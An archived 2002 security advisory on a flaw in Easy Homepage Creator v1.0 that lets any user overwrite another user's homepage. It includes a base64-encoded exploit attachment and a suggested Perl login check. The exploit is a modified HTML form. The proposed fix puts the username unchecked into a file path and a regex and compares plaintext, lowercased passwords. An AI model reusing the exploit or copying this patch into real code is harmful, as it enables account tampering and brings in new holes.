Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: General :: web5567.htm

Easy Homepage Creator priviledge escalation



29th Jul 2002 [SBWID-5567]
COMMAND

	Easy Homepage Creator priviledge escalation

SYSTEMS AFFECTED

	 Advanced Easy Homepage Creator v1.0 

	 Easy Homepage Creator v1.0 

	

PROBLEM

	In AresU advisory [http://bosen.net/advisories/aresu-adv.001.txt] :
	

	Everyone can change another  user  homepage  without  Access  Validation
	easily.
	

	 Exploit :

	 =======

	

	Change action in the html form.
	

	

	Content-Transfer-Encoding: base64

	Content-Description: easyhomepage.zip

	Content-Disposition: attachment; filename="easyhomepage.zip"

	

	UEsDBBQAAAAIAIMS/CwdaBQXdwIAAEQEAAARAAAAZWFzeWhvbWVwYWdlLmh0

	bWyNU1Fr20AMfjfsP2iGwQaOnXQPzYIdyLZmXWnX0KaFPpXznRoftX3mTpc0

	+/XTOfEKY4z5yZI/Sd/3Sc7fjkYQnQm3h3PTYCc2CF8sCjIW7n3dohWlrjXt

	IYq+CkLonxlc+HoPk2kCJ+PxCUS3uEUbUPzpXG8qeL8yzumyRiADqDRBg02J

	FqrjlA9ctHeEjYPF0xNKQjWDCI7PQm1FK1HB35ltJ+n4FfwvTHSPreLo7uZy

	BhVRN8uy3W6XItc4aXVHLpUm9c8QBbmw3nfIGr4TKIMOWkPgHcJCSnQO7kWt

	lSBt2t+yBj0QLTxVPKm3Z2HR3UH0zSLSz4CdwWfjsE1grQ36fQK4PP2YwK14

	1nShdyKBVjdqkcCSK6ulto4SWNQbw65WTQJXNl0JJdpNxNakrKYfcxRUhtZp

	i5QJtdWOa9Blghv5ESfS8XiS0gu9idaVduCMtxJBGoXA4RNTRuVlr0rU0Hnb

	cTu4/nH5EI1Gc7Ywr6ip57nEltByIq8m8/+4mDxjHKNJhDMojVVoizFIrOtO

	KKXbTXHSR64TMkQT2GlFVRF/Gr+LQ+Xy+uaK74ZtVUW8ur5dx9CKBoveeCED

	4yI+erDVHDfZsI4sYFK50aHRnUMbCmeQ67bzdOgS+2M6nudl0PVgPEjRHvZq

	qOJrDZDXFZdYmx3bzprwhdhgAdbsXBFPTmPQzHFAPoYWR7J/JqWpuWI6DcRW

	Nd8h/yLh6Pa8FxbrHEMd6BZ4PqY8KxuG9WYGouHGclIga+FcQaYbcgd1h3Tp

	icKdcu8idr5swvCtqD2HZ0HhsL2BZ6D3OJBlTzJS8358v/MsLOMQh332b/1d

	QPQLUEsBAhQAFAAAAAgAgxL8LB1oFBd3AgAARAQAABEAAAAAAAAAAQAgALaB

	AAAAAGVhc3lob21lcGFnZS5odG1sUEsFBgAAAAABAAEAPwAAAKYCAAAAAA==

	

SOLUTION

	Add Access Validation on  "print_html_to_file"  function.  Add  edit.cgi
	with this code:
	

	  sub login_check 

	  { 

	     if ($FORM{'username'} eq "" or $FORM{'password'}

	eq "") 

	     { 

	             dienice("Sorry, but you haven't entered a

	Username or Password.  Please press the 'back' button

	on your browser to return to the login screen."); 

	     } 

	     $FORM{'username'} =~ tr/A-Z/a-z/; 

	     $FORM{'password'} =~ tr/A-Z/a-z/; 

	     

	    

	open(PROFILE,"<$rootdir/profiles/$FORM{'username'}.pro")

	|| dienice("Sorry, but you have entered an invalid

	username or password.  Please press the 'back' button

	on your browser to return to the login form."); 

	     @DATA = <PROFILE>; 

	     chomp(@DATA); 

	     if (!($FORM{'username'} eq "@DATA[1]" &&

	$FORM{'password'} eq "@DATA[2]") 

	     { 

	             dienice("Sorry, but you have entered an

	invalid username or password.  Please press the 'back'

	button on your browser to return to the Login Form and

	try logging-in again."); 

	     } 

	     close(PROFILE); 

	

	    

	open(CHECK_USERNAME,"<$rootdir/profiles/ban_users.dat")

	|| dienice("Configuration Error!  Unable to open

	ban_users.dat file for reading.  Please contact the

	webmaster of this web site.  The following error

	occured : $!"); 

	     @check = <CHECK_USERNAME>; 

	     chomp(@check); 

	     close(CHECK_USERNAME); 

	     

	     foreach $line (@check) 

	     { 

	       if ($line =~ /$FORM{'username'}/gi) 

	       { 

	              dienice("Sorry, but you have been banned

	from using the Homepage Creator.  You should have been

	sent an email explaining why you have been banned from

	using the Homepage Creator.  For more details contact

	the webmaster of this web site."); 

	       } 

	     } 

	  } 

	

	  sub dienice 

	  { 

	     my($msg) = @_; 

	     print <<EndHTML; 

	     <html> 

	     <head> 

	     <title>Homepage Login Error</title> 

	     </head> 

	     <body bgcolor="$bg_colour"

	link="$hyperlinks_colour" vlink="$hyperlinks_colour"

	alink="$hyperlinks_colour"> 

	     <p align="center">$logo_url  

	$banner_url</p> 

	     <hr color="$linebreakcolour"> 

	     <p align="left"><b> Homepage Login

	Error</b></p> 

	     <p align="left"><b>$msg</b></p> 

	     <hr color="$linebreakcolour"> 

	     <p align="center"><b>) Copyright
	     <a href="http://www.easyscripts.co.uk"> 

	     Easy Scripts Archive</a> 2001.  All Rights

	Reserved.</b></p> 

	     </body> 

	     </html> 

	     EndHTML 

	     exit; 

	  } 

	

	And on the first line of "print_html_to_file" function add this:
	

	&login_check; 

	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH